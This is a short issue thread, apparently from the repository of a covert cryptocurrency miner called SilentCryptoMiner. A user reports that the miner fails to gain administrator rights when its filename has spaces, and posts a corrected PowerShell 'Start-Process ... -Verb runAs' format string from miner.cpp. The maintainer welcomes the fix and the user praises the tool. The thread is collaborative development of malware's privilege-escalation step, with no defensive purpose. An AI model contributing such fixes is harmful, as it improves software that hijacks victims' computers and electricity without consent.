### ISSUE TITLE
Miner can't run as administrator when filename has whitespaces

### ISSUE THREAD

**Issue by Wooyme** [UnamSanctam/SilentCryptoMiner#2146]
I found that If the miner's filename has whitespaces, it would not run as administrator.
And I realize the problem lies on the 64 line of miner.cpp.
I fixed it by replacing
```C++
"%S Start-Process \"%S\" -Verb runAs"
```
to
```C++
"%S Start-Process '%S' -Verb runAs"
```
It works for me. I don't know if it will cause other problem.

**Comment by UnamSanctam** [comment]
I see, I thought it was something like that but couldn't find anything. It seems like that only happens on some computers so thank you for confirming it, because both ways work for me (so I haven't been able to reproduce that issue).

**Comment by Wooyme** [comment]
Thanks for your reminder.
Since `'` do not very often appear in file path,I'll deal with it like this for now.
Btw, thank you for your work. It helped a lot.
